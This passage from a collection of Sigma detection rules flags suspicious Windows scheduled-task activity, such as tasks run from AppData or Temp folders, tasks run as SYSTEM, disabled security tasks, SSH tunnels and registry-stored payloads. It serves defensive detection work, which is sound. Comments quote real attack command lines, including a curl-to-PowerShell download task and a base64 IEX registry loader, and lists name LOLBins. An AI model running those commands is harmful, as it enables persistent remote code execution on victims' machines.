    "content": "title: Suspicious Schtasks Execution AppData Folder\nid: c5c00f49-b3f9-45a6-997e-cfdecc6e1967\nstatus: test\ndescription: 'Detects the creation of a schtask that executes a file from C:\\Users\\<USER>\\AppData\\Local'\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-03-15\nmodified: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/Create'\n            - '/RU'\n            - '/TR'\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\'\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets its own value with space\n    filter:\n        # FP from test set in SIGMA\n        ParentImage|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - 'TeamViewer_.exe'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/TN TVInstallRestore'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_change.yml",
    "content": "title: Suspicious Modification Of Scheduled Tasks\nid: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b\nrelated:\n    - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 # Security-Auditing Eventlog\n      type: similar\nstatus: test\ndescription: |\n    Detects when an attacker tries to modify an already existing scheduled task to run from a suspicious location\n    Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\n    Instead they modify the task after creation to include their malicious payload\nreferences:\n    - Internal Research\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-28\nmodified: 2022-11-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_schtasks:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /Change '\n            - ' /TN '\n    selection_susp_locations:\n        CommandLine|contains:\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\'\n            - '\\Users\\Public\\'\n            - '\\WINDOWS\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Temporary Internet'\n            - 'C:\\ProgramData\\'\n            - 'C:\\Perflogs\\'\n            - '%ProgramData%'\n            - '%appdata%'\n            - '%comspec%'\n            - '%localappdata%'\n    selection_susp_images:\n        CommandLine|contains:\n            - 'regsvr32'\n            - 'rundll32'\n            - 'cmd /c '\n            - 'cmd /k '\n            - 'cmd /r '\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n            - 'powershell'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'certutil'\n            - 'bitsadmin'\n            - 'bash.exe'\n            - 'bash '\n            - 'scrcons'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'forfiles'\n            - 'scriptrunner'\n            - 'hh.exe'\n            - 'hh '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_creation.yml",
    "content": "title: Scheduled Task Creation Via Schtasks.EXE\nid: 92626ddd-662c-49e3-ac59-f6535f12d189\nstatus: test\ndescription: Detects the creation of scheduled tasks by user accounts via the \"schtasks\" utility.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-01-16\nmodified: 2025-10-22\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\n    - attack.s0111\n    - car.2013-08-001\n    - stp.1u\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: ' /create '\n    filter_main_system_user:\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    filter_optional_msoffice:\n        #  schtasks.exe /Create /tn \"Microsoft\\Office\\Office Performance Monitor\" /XML \"C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_Office Performance Monitor.xml\"\n        ParentImage:\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n        Image:\n            - 'C:\\Windows\\System32\\schtasks.exe'\n            - 'C:\\Windows\\SysWOW64\\schtasks.exe'\n        CommandLine|contains: 'Microsoft\\Office\\Office Performance Monitor'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrative activity\n    - Software installation\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml",
    "content": "title: Suspicious Scheduled Task Creation Involving Temp Folder\nid: 39019a4e-317f-4ce3-ae63-309a8c6b53c5\nstatus: test\ndescription: Detects the creation of scheduled tasks that involves a temporary folder and runs only once\nreferences:\n    - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-11\nmodified: 2022-10-09\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /create '\n            - ' /sc once '\n            - '\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Administrative activity\n    - Software installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_curl_and_powershell_combo.yml",
    "content": "title: Scheduled Task Creation with Curl and PowerShell Execution Combo\nid: 1d174d38-8fda-4081-a9b6-56d9763c0cd8\nstatus: experimental\ndescription: |\n    Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.\n    This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.\nreferences:\n    - https://tria.ge/241015-l98snsyeje/behavioral2\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-05\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr \"conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell\" /rl Highest\n    selection_img:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|windash: ' /create '\n    selection_curl:\n        CommandLine|contains|all:\n            - 'curl '\n            - 'http'\n            - '-o'\n    selection_powershell:\n        CommandLine|contains: 'powershell'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of schtasks for administrative purposes.\n    - Automation scripts combining curl and PowerShell in controlled environments.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_delete.yml",
    "content": "title: Delete Important Scheduled Task\nid: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78\nrelated:\n    - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog\n      type: similar\n    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Auditing Eventlog\n      type: similar\nstatus: test\ndescription: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/delete'\n            - '/tn'\n        CommandLine|contains:\n            # Add more important tasks\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\ExploitGuard'\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\UpdateOrchestrator\\'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_delete_all.yml",
    "content": "title: Delete All Scheduled Tasks\nid: 220457c1-1c9f-4c2e-afe6-9598926222c1\nstatus: test\ndescription: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - ' /delete '\n            - '/tn \\*'\n            - ' /f'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_disable.yml",
    "content": "title: Disable Important Scheduled Task\nid: 9ac94dc8-9042-493c-ba45-3b5e7c86b980\nrelated:\n    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Auditing Eventlog\n      type: similar\nstatus: test\ndescription: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task\n    - https://twitter.com/MichalKoczwara/status/1553634816016498688\n    - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior\ndate: 2021-12-26\nmodified: 2024-08-25\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/Change'\n            - '/TN'\n            - '/disable'\n        CommandLine|contains:\n            # Add more important tasks\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\ExploitGuard'\n            - '\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh'\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\UpdateOrchestrator\\'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml",
    "content": "title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE\nid: 81325ce1-be01-4250-944f-b4789644556f\nrelated:\n    - id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline\n      type: derived\nstatus: test\ndescription: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware\nreferences:\n    - https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/\n    - https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04\n    - https://blog.talosintelligence.com/gophish-powerrat-dcrat/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-21\nmodified: 2025-10-07\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_1_create:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|windash: ' /create '\n    selection_1_all_folders:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - ':\\Users\\All Users\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public'\n            - ':\\Windows\\Temp'\n            - '\\AppData\\Local\\'\n            - '\\AppData\\Roaming\\'\n            - '%AppData%'\n            - '%Public%'\n    selection_2_parent:\n        ParentCommandLine|endswith: '\\svchost.exe -k netsvcs -p -s Schedule'\n    selection_2_some_folders:\n        CommandLine|contains:\n            - ':\\Perflogs'\n            - ':\\Windows\\Temp'\n            - '\\Users\\Public'\n            - '%Public%'\n    filter_optional_other:\n        - ParentCommandLine|contains: 'unattended.ini'\n        - CommandLine|contains: 'update_task.xml'\n    filter_optional_team_viewer:\n        CommandLine|contains: '/Create /TN TVInstallRestore /TR'\n    filter_optional_avira_install:\n        # Comment out this filter if you don't use AVIRA\n        CommandLine|contains|all:\n            - '/Create /Xml '\n            - '\\Temp\\.CR.'\n            - '\\Avira_Security_Installation.xml'\n    filter_optional_avira_other:\n        # Comment out this filter if you don't use AVIRA\n        CommandLine|contains|all:\n            - '/Create /F /TN'\n            - '/Xml '\n            - '\\Temp\\'\n            - 'Avira_'\n        CommandLine|contains:\n            - '.tmp\\UpdateFallbackTask.xml'\n            - '.tmp\\WatchdogServiceControlManagerTimeout.xml'\n            - '.tmp\\SystrayAutostart.xml'\n            - '.tmp\\MaintenanceTask.xml'\n    filter_optional_klite_codec:\n        CommandLine|contains|all:\n            - '\\Temp\\'\n            - '/Create /TN \"klcp_update\" /XML '\n            - '\\klcp_update_task.xml'\n    condition: ( all of selection_1_* or all of selection_2_* ) and not 1 of filter_optional_*\nfalsepositives:\n    - Benign scheduled tasks creations or executions that happen often during software installations\n    - Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_folder_combos.yml",
    "content": "title: Schtasks From Suspicious Folders\nid: 8a8379b8-780b-4dbf-b1e9-31c8d112fefb\nstatus: test\ndescription: Detects scheduled task creations that have suspicious action command and folder combinations\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-15\nmodified: 2022-11-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_create:\n        CommandLine|contains: ' /create '\n    selection_command:\n        CommandLine|contains:\n            - 'powershell'\n            - 'pwsh'\n            - 'cmd /c '\n            - 'cmd /k '\n            - 'cmd /r '\n            - 'cmd.exe /c '\n            - 'cmd.exe /k '\n            - 'cmd.exe /r '\n    selection_all_folders:\n        CommandLine|contains:\n            - 'C:\\ProgramData\\'\n            - '%ProgramData%'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml",
    "content": "title: Suspicious Scheduled Task Name As GUID\nid: ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b\nstatus: test\ndescription: Detects creation of a scheduled task with a GUID like name\nreferences:\n    - https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains: '/Create '\n    selection_tn:\n        CommandLine|contains:\n            # Can start with single or double quote\n            - '/TN \"{'\n            - \"/TN '{\"\n            - \"/TN {\"\n    selection_end:\n        CommandLine|contains:\n            # Ending of the name to avoid possible FP in the rest of the commandline\n            - '}\"'\n            - \"}'\"\n            - '} '\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate software naming their tasks as GUIDs\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml",
    "content": "title: Uncommon One Time Only Scheduled Task At 00:00\nid: 970823b7-273b-460a-8afc-3a6811998529\nstatus: test\ndescription: Detects scheduled task creation events that include suspicious actions, and are run once at 00:00\nreferences:\n    - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nauthor: pH-T (Nextron Systems)\ndate: 2022-07-15\nmodified: 2023-02-03\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'wscript'\n            - 'vbscript'\n            - 'cscript'\n            - 'wmic '\n            - 'wmic.exe'\n            - 'regsvr32.exe'\n            - 'powershell'\n            - '\\AppData\\'\n    selection_time:\n        CommandLine|contains|all:\n            - 'once'\n            - '00:00'\n    condition: all of selection_*\nfalsepositives:\n    - Software installation\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_openssh_tunnelling.yml",
    "content": "title: Potential SSH Tunnel Persistence Install Using A Scheduled Task\nid: 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f\nstatus: experimental\ndescription: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects task creations that call OpenSSH, which may indicate the creation of a reverse SSH tunnel to the attacker's server.\nreferences:\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection\nauthor: Rory Duncan\ndate: 2025-07-14\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\n    - attack.command-and-control\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_sshd:\n        CommandLine|contains|all:\n            - ' /create '\n            - 'sshd.exe'\n            - '-f'\n    selection_cli_ssh:\n        CommandLine|contains|all:\n            - ' /create '\n            - 'ssh.exe'\n            - '-i'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml",
    "content": "title: Potential Persistence Via Microsoft Compatibility Appraiser\nid: f548a603-c9f2-4c89-b511-b089f7e94549\nrelated:\n    - id: 73a883d0-0348-4be4-a8d8-51031c2564f8\n      type: derived\nstatus: test\ndescription: |\n    Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\n    In order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\nreferences:\n    - https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/\nauthor: Sreeman\ndate: 2020-09-29\nmodified: 2023-02-10\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'run '\n            - '\\Application Experience\\Microsoft Compatibility Appraiser'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml",
    "content": "title: Potential Persistence Via Powershell Search Order Hijacking - Task\nid: b66474aa-bd92-4333-a16c-298155b120df\nrelated:\n    - id: 6e8811ee-90ba-441e-8486-5653e68b2299\n      type: similar\nstatus: test\ndescription: Detects suspicious powershell execution via a schedule task where the command ends with suspicious flags to hide the powershell instance instead of executing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader\nreferences:\n    - https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\nauthor: pH-T (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-04-08\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage: 'C:\\WINDOWS\\System32\\svchost.exe'\n        ParentCommandLine|contains|all:\n            - '-k netsvcs'\n            - '-s Schedule'\n        CommandLine|endswith:\n            - ' -windowstyle hidden'\n            - ' -w hidden'\n            - ' -ep bypass'\n            - ' -noni'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml",
    "content": "title: Scheduled Task Executing Payload from Registry\nid: 86588b36-c6d3-465f-9cee-8f9093e07798\nrelated:\n    - id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78\n      type: derived\nstatus: test\ndescription: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        # schtasks.exe /Create /F /TN \"{97F2F70B-10D1-4447-A2F3-9B070C86E261}\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\Pvoeooxf).yzbbvhhdypa))) \" /SC MINUTE /MO 30\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_create:\n        CommandLine|contains: '/Create'\n    selection_cli_get:\n        CommandLine|contains:\n            - 'Get-ItemProperty'\n            - ' gp ' # Alias\n    selection_cli_hive:\n        CommandLine|contains:\n            - 'HKCU:'\n            - 'HKLM:'\n            - 'registry::'\n            - 'HKEY_'\n    filter_main_encoding:\n        CommandLine|contains:\n            - 'FromBase64String'\n            - 'encodedcommand'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml",
    "content": "title: Scheduled Task Executing Encoded Payload from Registry\nid: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78\nstatus: test\ndescription: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.\nreferences:\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-02-12\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        # schtasks.exe /Create /F /TN \"{97F2F70B-10D1-4447-A2F3-9B070C86E261}\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\Pvoeooxf).yzbbvhhdypa))) \" /SC MINUTE /MO 30\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_create:\n        CommandLine|contains: '/Create'\n    selection_cli_encoding:\n        CommandLine|contains:\n            - 'FromBase64String'\n            - 'encodedcommand'\n    selection_cli_get:\n        CommandLine|contains:\n            - 'Get-ItemProperty'\n            - ' gp ' # Alias\n    selection_cli_hive:\n        CommandLine|contains:\n            - 'HKCU:'\n            - 'HKLM:'\n            - 'registry::'\n            - 'HKEY_'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml",
    "content": "title: Suspicious Schtasks Schedule Types\nid: 24c8392b-aa3c-46b7-a545-43f71657fe98\nrelated:\n    - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a\n      type: similar\nstatus: test\ndescription: Detects scheduled task creations or modification on a suspicious schedule type\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_time:\n        CommandLine|contains:\n            - ' ONLOGON '\n            - ' ONSTART '\n            - ' ONCE '\n            - ' ONIDLE '\n    filter_privs:\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets its own value with space\n            - 'HIGHEST'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate processes that run at logon. Filter according to your environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml",
    "content": "title: Suspicious Schtasks Schedule Type With High Privileges\nid: 7a02e22e-b885-4404-b38b-1ddc7e65258a\nrelated:\n    - id: 24c8392b-aa3c-46b7-a545-43f71657fe98\n      type: similar\nstatus: test\ndescription: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-31\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_time:\n        CommandLine|contains:\n            - ' ONLOGON '\n            - ' ONSTART '\n            - ' ONCE '\n            - ' ONIDLE '\n    selection_privs:\n        CommandLine|contains:\n            - 'NT AUT' # This covers the usual NT AUTHORITY\\SYSTEM\n            - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets its own value with space\n            - 'HIGHEST'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers were seen using this method of creation unfortunately. Filter them in your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml",
    "content": "title: Suspicious Scheduled Task Creation via Masqueraded XML File\nid: dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c\nstatus: test\ndescription: Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. This behavior could be indicative of a potential defense evasion attempt during persistence\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-\n    - https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml\nauthor: Swachchhanda Shrawan Poudel, Elastic (idea)\ndate: 2023-04-20\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1036.005\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_cli_create:\n        CommandLine|contains:\n            - '/create'\n            - '-create'\n    selection_cli_xml:\n        CommandLine|contains:\n            - '/xml'\n            - '-xml'\n    filter_main_extension_xml:\n        CommandLine|contains: '.xml'\n    filter_main_system_process:\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n    filter_main_rundll32:\n        ParentImage|endswith: '\\rundll32.exe'\n        ParentCommandLine|contains|all:\n            - ':\\WINDOWS\\Installer\\MSI'\n            - '.tmp,zzzzInvokeManagedCustomActionOutOfProc'\n    filter_optional_third_party:\n        ParentImage|endswith:\n            # Consider removing any tools that you don't use to avoid blind spots\n            - ':\\ProgramData\\OEM\\UpgradeTool\\CareCenter_*\\BUnzip\\Setup_msi.exe'\n            - ':\\Program Files\\Axis Communications\\AXIS Camera Station\\SetupActions.exe'\n            - ':\\Program Files\\Axis Communications\\AXIS Device Manager\\AdmSetupActions.exe'\n            - ':\\Program Files (x86)\\Zemana\\AntiMalware\\AntiMalware.exe'\n            - ':\\Program 